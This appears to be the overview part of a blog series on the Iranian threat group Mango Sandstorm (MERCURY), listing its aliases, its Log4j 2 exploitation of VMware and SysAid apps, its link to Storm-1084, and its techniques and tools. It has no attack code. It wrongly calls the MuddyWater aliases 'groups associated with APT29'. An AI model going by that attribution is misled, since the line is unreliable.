While I am tracing back the history of Mango Sandstorm, formerly known as MERCURY, I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response.
| # | Title | About |
|---|---|---|
| Part 1 | Day4-Mango-Sandstorm-Part1-Overview.md <we are here !!> | Mango Sandstorm overview |
| Part 2 | Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md | August 25, 2022, Mango Sandstorm |
| Part 3 | Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md | April 7, 2023, Mango Sandstorm & Storm-1084 |
Mango Sandstorm, formerly known as MERCURY, is an Iranian-based cyber activity group that specializes in sensitive data gathering through advanced cyber attacks, rather than financial gain. Their attack techniques include spear-phishing attacks, exploiting vulnerabilities, malware and social engineering.
To get the detailed insight, Microsoft Defender Threat Intelligence also covers Mango Sandstorm's description, TTP, and IOCs.
Mango Sandstorm, Microsoft Defender Threat Intelligence
Mango Sandstorm, previously known for using Log4j 2 exploits to attack VMware apps, has recently been targeting SysAid apps using the same technique. Once they gain initial access, the group establishes persistence, moves laterally within the network using custom and well-known hacking tools, and dumps credentials.
Mango Sandstorm, previously known for using Log4j 2 exploits and targeting on-premises environments, has now expanded its focus to include both on-premises and cloud environments. After gaining initial access through known vulnerabilities, the attack has been linked to Storm-1084 (formerly known as DEV-1084).
There are several groups associated with APT29, and each group uses different attack techniques.
- Earth Vetala
- Mango Sandstorm (MERCURY)
- Static Kitten
- Seedworm
- TEMP.Zagros
- MuddyWater
- Spear-phishing email
- Use of cloud file-sharing services
- Use of commercial remote access applications
- Tooling: Venom proxy tool, Ligolo reverse tunneling, and home-grown PowerShell programs
- Exploiting vulnerabilities
- Social engineering
- Watering hole attacks
- Backdoor installation
- Lateral movement
MuddyWater, Techniques Used, ATT&CK® Navigator
- August 25, 2022, MERCURY leveraging Log4j 2 vulnerabilities in unpatched systems to target Israeli organizations
- April 7, 2023, MERCURY and DEV-1084: Destructive attack on hybrid environment
- What is Microsoft Defender Threat Intelligence (Defender TI)?
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.